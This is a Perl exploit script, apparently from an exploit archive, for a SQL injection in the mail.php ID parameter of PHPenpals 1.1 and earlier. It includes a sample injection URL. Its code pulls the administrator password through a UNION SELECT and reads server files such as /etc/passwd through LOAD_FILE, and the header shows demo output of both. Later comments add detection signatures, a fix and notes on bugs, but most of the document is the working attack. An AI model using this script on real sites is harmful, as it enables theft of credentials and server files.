PHPenpals <= 1.1 (mail.php ID) Remote SQL Injection Exploit
来源:br0ly.Code@gmail.com 作者:Br0ly 发布时间:2009-05-18  

#!/usr/bin/perl
#|------------------------------------------------------------------------------------------------------------------
#| -Info:
#
#| -Name: Phpenpals
#| -Version: <= 1.1
#| -Site: http://sourceforge.net/projects/phpenpals/
#| -Download Script: http://sourceforge.net/project/showfiles.php?group_id=40166&package_id=32303&release_id=250717
#| -Bug: Sql Injection
#| -Found: by Br0ly
#| -BRAZIL >D
#| -Contact: br0ly.Code@gmail.com
#|
#| -Gretz: Osirys , xs86 , 6_Bl4ck9_f0x6 , str0ke
#|
#| -p0c:
#| -SQL INJECTION:
#|
#| -http://localhost/Scripts/phpenpals/mail.php?ID=-1+union+select+1,@@version--
#| -Vuls: @array = ('profile.php?personalID=' , 'mail.php?ID=')
#|  
#| - You just need the admin's password to log in at:
#| - http://localhost/Scripts/phpenpals/admin.php
#|
#| -Exploit: Demo:
#|------------------------------------------------------------------------------------------------------------------
#|
#| perl phpenpals.txt http://localhost/Scripts/phpenpals/ 1
#|
#|  --------------------------------------
#|   -Phpenpals                    
#|   -Sql Injection                     
#|   -by Br0ly                          
#|  --------------------------------------
#|
#|[+] Getting the pass of the admin.
#|[+] Password = admin
#|
#|perl phpenpals.txt http://localhost/Scripts/phpenpals/ 2
#|
#|  --------------------------------------
#|   -Phpenpals                    
#|   -Sql Injection                     
#|   -by Br0ly                          
#|  --------------------------------------
#|
#|[*] Cat:/etc/passwd
#|    
#|
#|root:x:0:0:root:/root:/bin/bash
#|daemon:x:1:1:daemon:/usr/sbin:/bin/sh
#|bin:x:2:2:bin:/bin:/bin/sh
#|sys:x:3:3:sys:/dev:/bin/sh
#|sync:x:4:65534:sync:/bin:/bin/sync
#|games:x:5:60:games:/usr/games:/bin/sh
#|man:x:6:12:man:/var/cache/man:/bin/sh
#|lp:x:7:7:lp:/var/spool/lpd:/bin/sh
#|
#| ;D
#| And sorry for my bad english ;/
#|
 
  use IO::Socket::INET;
  use LWP::UserAgent;

  my $host      = $ARGV[0];
  my $opcao     = $ARGV[1];
  my $sql_path  = "/mail.php?ID=";
 
  if (@ARGV < 2) {
      &banner();
      &help("-1");
  }
 
  elsif(cheek($host,$opcao) == 1) {
      &banner();
      &xploit($host,$opcao,$sql_path);
  }
    
  else {
      &banner();
      help("-2");
  }
 
  sub xploit() {
      my $host     = $_[0];
      my $opcao    = $_[1];
      my $sql_path = $_[2];
      if($opcao == 1) { &adm_pass($host,$sql_path);  }
      if($opcao == 2) { &file_load($host,$sql_path); }
  }

  # Option 1: read the administrator password through the UNION-based
  # injection in mail.php's ID parameter.  Never returns to the caller:
  # both branches end in exit(0).
  #
  # Args: $_[0] base URL (http://host/path/), $_[1] the "/mail.php?ID="
  # fragment.
  # Application-side fix: cast ID to an integer or bind it as a prepared
  # statement parameter before it reaches the query.
  sub adm_pass() {
    
      print "[+] Getting the pass of the admin.\n";
      my $host     = $_[0];
      my $spl_path = $_[1];
      # ID=-1 presumably makes the legitimate query return no row, so the
      # UNIONed row is what the page renders.  The injected SELECT has two
      # columns (the target query is assumed to select two) and wraps
      # admin.password between hex-encoded markers: 0x6272306c79 = "br0ly",
      # 0x3a = ":".  The markers make extraction independent of page layout;
      # for defenders they, together with "union+select" and "from+admin" in
      # the query string, are an easy WAF/IDS signature.
      my $sql_atk = $host.$spl_path."-1+union+select+1,concat(0x6272306c79,0x3a,password,0x3a,0x6272306c79)+from+admin--";
      # Raw response body; get_url() does not check the HTTP status, so an
      # error page simply fails the match below.
      my $re = get_url($sql_atk);
      # $1 is consumed on the very next line, so the bare capture is safe.
      # The demo output in the header prints "admin" verbatim, which suggests
      # the column is stored unhashed -- TODO confirm against the schema.
      if($re =~ /br0ly:(.+):br0ly/) {
    print "[+] Password = $1\n";
    exit(0);
      }
      else {
    # Exit status is 0 even on failure; the shell cannot tell the outcomes apart.
    print "[-] Exploit, Fail\n";
    exit(0);
    
      }
  }
 
  # Option 2: interactive "cat" over the injection point.  Reads a path from
  # STDIN, sends it as a hex literal to MySQL LOAD_FILE() through the same
  # UNION injection, and prints whatever comes back inside the page's
  # <table> markup.  On MySQL, LOAD_FILE() reads from the *database server's*
  # filesystem and needs the FILE privilege (and a permissive
  # secure_file_priv), so a least-privilege DB account blocks this half of
  # the script even where the injection itself is still present.
  #
  # Control flow is recursive: every prompt is a fresh frame, and several
  # branches recurse and then fall through (noted inline).  $c, used below,
  # is an undeclared package global -- the file has no 'use strict'.
  sub file_load() {
 
     my $host     = $_[0];
     my $spl_path = $_[1];
   
     print "[*] Cat:";
     my $file = <STDIN>;
     chomp($file);
     # Quits when "exit" is typed -- but also for any path that merely
     # contains "exit" (unanchored match).
     $file !~ /exit/ || die "[-] Quitting ..\n";
   
     # Only checks that a '/' appears somewhere.  After the recursive prompt
     # returns, execution continues below with the *rejected* $file.
     if ($file !~ /\/(.*)/) {
    print "\n[-] Bad filename !\n";
    &file_load($host,$spl_path);
     }
   
     # The path travels as a 0x... hex literal, so the injected SQL contains
     # no quote characters; "load_file(0x" in the query string is a usable
     # detection signature in web server logs.
     my $fencode = hex_str($file);
     my $byte = "0x";
     my $fl_atk = $host.$spl_path."-1+union+select+1,load_file(".$byte.$fencode.")--";
     my $re = get_url($fl_atk);
     # tag() turns spaces into '$' and other whitespace into '*' so the
     # single-line regex below can span the page's newlines.
     my $content = tag($re);
        
     # Assumes the file content lands in the first <td> of a two-cell row
     # that follows "<table>" plus two non-space whitespace characters (e.g.
     # a CRLF) -- tied to PHPenpals' mail.php markup; TODO confirm against
     # the template.
     if ($content =~ /<table>\*\*<tr><td>(.+)<\/td><td><\/td><\/tr>/) {
    my $out = $1;
  
        # Undo the tag() encoding, then strip the form words rendered next to
        # the cell.  Note these also replace "Send"/"email"/"to" wherever they
        # occur inside the file contents themselves.
        $out =~ s/\$/ /g;
    $out =~ s/\*\*\*\*/ /g;
    $out =~ s/\*/\n/g;
    $out =~ s/Send/ /g;
    $out =~ s/email/ /g;
    $out =~ s/to/ /g;
        # Meant to append a newline, but $out is interpolated unescaped as the
        # pattern, so any regex metacharacter in the file content makes this
        # step fail or misfire ($out .= "\n" is what is intended).
        $out =~ s/$out/$out\n/ if ($out !~ /\n$/);
        print "$out";
    # Prompts again here; everything below runs only once that frame returns.
    &file_load($host,$spl_path);

    # A bare string on the right of =~ is used as a pattern: this matches a
    # single space, which the substitutions above almost always leave in $out.
    if($out =~ ' ') {
      $c++;
      print "[-] Can't find ".$file." \n";
      if ( $c < 3 ) {
        print "[-] Exploit Fail\n\n";
        &file_load($host,$spl_path);
      }
  
      else { exit(0); }
  
    }
      }
 
  }  

  sub get_url() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
  }

  sub tag() {
    my $string = $_[0];
    $string =~ s/ /\$/g;
    $string =~ s/\s/\*/g;
    return($string);
  }

  sub hex_str () {
  
    my $str_1 = $_[0];
    my $str_hex = unpack('H*', "$str_1");
    return $str_hex;
  
  }

  sub cheek() {
    my $host  = $_[0];
    my $opcao = $_[1];
    if (($host =~ /http:\/\/(.*)/) && (($opcao == 1 || $opcao == 2))) {
        return 1;
    }
    else {
        return 0;
    }
  }

  sub help() {

    my $error = $_[0];
    if ($error == -1) {
        print "\n[-] Error, missed some arguments !\n\n";
    }
  
    elsif ($error == -2) {

        print "\n[-] Error, Bad arguments !\n\n";
    }
 
    print "[*] Usage : perl $0 http://localhost/phpenpals/ opcao \n";
    print "    Ex:     perl $0 http://localhost/phpenpals/ 1\n";
    print "[*] opcao 1 : adm pass\n";
    print "[*] opcao 2 : file_disc\n";
    exit(0);
  }

  sub banner {
    print "\n".
          "  --------------------------------------\n".
          "   -Phpenpals                       \n".
          "   -Sql Injection                       \n".
          "   -by Br0ly                            \n".
          "  --------------------------------------\n\n";
  }


 